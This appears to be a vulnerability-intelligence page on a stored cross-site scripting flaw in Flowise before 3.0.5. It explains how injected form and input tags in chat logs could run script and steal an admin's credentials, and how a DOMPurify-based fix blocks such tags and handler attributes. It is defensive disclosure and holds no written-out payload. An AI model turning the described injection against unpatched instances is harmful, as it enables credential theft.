-
CVSS Score
-Basic Information
CVE ID
-
GHSA ID
-
EPSS Score
-
CWE
-
Published
-
Updated
-
KEV Status
-
Technology
-
Technical Details
Vulnerability Intelligence
Miggo AI
Miggo AIMiggo AIMiggo AIRoot Cause AnalysisThe vulnerability is a stored Cross-Site Scripting (XSS) issue within the Flowise application, specifically in how it handles and displays user-provided content in chat logs and execution details. The root cause is the use of React's dangerouslySetInnerHTML property in multiple components to render HTML content that could be controlled by an attacker. The PoC demonstrates that an attacker could inject <form> and <input> tags to create interactive elements that, when clicked by an admin, execute malicious JavaScript to steal credentials or perform other unauthorized actions.
The investigation of the fixing commit 9a06a85a8ddcbaeca1342827a5fea9087a587d97 confirms this analysis. The patch systematically replaces instances of dangerouslySetInnerHTML across several React components (ViewMessagesDialog, NodeExecutionDetails, ChatMessage, and JSONViewer) with a newly introduced SafeHTML component. This new component utilizes the DOMPurify library to sanitize the HTML, explicitly forbidding dangerous tags like <form>, <input>, and <script>, and attributes like onerror and onclick. By sanitizing the content before it is rendered, the patch ensures that any malicious payloads are neutralized, thus mitigating the XSS vulnerability.
| Package Name | Ecosystem | Vulnerable Versions | First Patched Version |
|---|---|---|---|
| flowise | npm | < 3.0.5 | 3.0.5 |
JavaScriptJavaScriptOngoing coverage of React2Shell